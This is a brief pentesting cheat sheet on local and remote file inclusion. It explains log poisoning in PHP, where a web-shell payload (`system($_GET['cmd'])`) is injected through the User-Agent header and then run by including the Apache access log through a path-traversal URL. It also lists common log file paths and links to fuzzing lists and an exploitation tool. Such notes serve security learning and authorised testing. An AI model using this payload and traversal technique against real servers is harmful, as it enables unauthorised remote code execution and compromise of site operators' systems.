LFI / RFI
File inclusion occurs when the user can control the file that will be loaded by the server.
LFI (Local File Inclusion) -> The server loads a local file.
RFI (Remote File Inclusion) -> The server loads a file located on a remote server.
Log Poisoning
How does this work?
Let’s imagine that the website is using PHP and you can control the file that is being loaded (LFI). You want to be able to execute php code to gain RCE.
You replace your User-Agent by a malicious PHP code. So, when you display the log file, your User-Agent will appear and the code will be executed.
Example:
User-Agent:
1
<?php system($_GET['cmd']); ?>
Url :
http://site.com/test.php?view=../../../../../var/log/apache2/access.log?cmd=ls
Here the output of the “ls” command is display on the screen.
Possible log files:
1
2
3
4
5
6
7
8
9
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
LFI lists for fuzzing:
- https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
Tools:
- https://github.com/takabaya-shi/LFI2RCE